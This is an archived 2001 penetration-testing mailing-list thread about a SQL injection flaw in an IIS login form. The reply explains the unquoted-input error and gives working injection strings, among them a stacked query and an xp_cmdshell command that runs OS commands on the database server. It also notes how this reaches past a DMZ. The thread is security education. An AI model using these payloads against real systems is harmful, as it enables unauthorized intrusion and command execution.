Penetration Testing mailing list archives
RE: SQL
From: Javier Fernández-Sanguino <jfernandez () germinus com>
Date: Tue, 20 Nov 2001 09:41:39 +0100
You migh (90% chance) have a possibility to a) alter the database b) execute remote commands in the SQL server This is a common error (not quoting quotes :), this is due to the SQL statement being executed in the ISS server (through an ODBC connection) is just added the information given by the user. Thus: SELECT * from test where value='$user' if user=' becomes: SELECT * from test where value=''' which generates your error. However, you can do the following if user=test'; select * from test -- becomes: SELECT * from test where value='test'; select * from test -- ' which is a valid SQL statement (two as a matter of fact) and if user=test'; exec master..xp_cmdshell 'dir' -- becomes: SELECT * from test where value='test'; exec master..xp_cmdshell 'dir' -- which will run the 'dir' command in the SQL server (not in the IIS!) This is fun since, in some cases, the ISS server is in a DMZ and the SQL server is in the internal lan or through another firewall like this: Internet ----- Fw -------- Fw --------- Local network | | IIS SQL server or Internet ----- Fw -------- Local network | | IIS SQL server So you might be one step closer to your target ! Some references (fresh out from google): http://www.sqlsecurity.com/faq-inj.asp http://www.silksoft.co.za/data/sqlinjectionattack.htm Regards Javier Fernández-Sanguino Peña
Hello all, I am doing a pen test against a IIS 5 web server. The web server requires a user name and password via a logon form. if a single quote character is entered (username)the following error is produced [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '' and password=''. I remember reading somewhere that this can be used to gain further access? but i cant find the info. Can any one help? Thanks in advance. Gary -------------------------------------------------------------- -------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/